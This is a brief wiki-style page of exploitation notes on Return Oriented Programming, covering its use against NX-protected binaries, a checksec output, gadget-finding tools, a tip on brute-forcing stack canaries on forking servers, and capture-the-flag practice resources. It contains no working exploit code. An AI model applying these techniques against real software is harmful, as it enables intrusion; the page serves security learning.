Return Oriented Programming

ROP is an exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection (NX) and code signing.

Use Case

One of the primary use cases for attacking a binary with a ROP exploit is when it has NX set. The NX bit (no-execute) is a software protection mechanism that prevents us from executing shellcode on the stack, therefore we need to reuse code segments from within the binary to execute our desired instructions - this is called a ROP chain.

$ checksec -f binary
RELRO           STACK CANARY      NX        
Partial RELRO   No canary found   NX enabled

Tools

Ropper

GitHub - sashs/Ropper: Display information about files in different file formats and find gadgets to build rop chains for different architectures (x86/x86_64, ARM/ARM64, MIPS, PowerPC, SPARC64). For disassembly ropper uses the awesome Capstone Framework.GitHub

ROPGadget

GitHub - JonathanSalwan/ROPgadget: This tool lets you search your gadgets on your binaries to facilitate your ROP exploitation. ROPgadget supports ELF, PE and Mach-O format on x86, x64, ARM, ARM64, PowerPC, SPARC, MIPS, RISC-V 64, and RISC-V Compressed architectures.GitHub

Finding Gadgets

Forking Socket Servers

You can brute force the stack canary, base pointer, and return pointer.

Examples

"Old Bridge" binex challenge on HackTheBox
"Rope" root exploit on HackTheBox

Practice

Hands-down, the best way to practice ROP is by going through the challenges on ROP Emporium. Solutions are posted online if you get stuck.

ROP Emporiumropemporium.com

PreviousCode Reuse Attacks NextReturn to libc

Last updated 6 years ago

hashtagUse Case

hashtagTools

hashtagRopper

hashtagROPGadget

hashtagFinding Gadgets

hashtagForking Socket Servers

hashtagExamples

hashtagPractice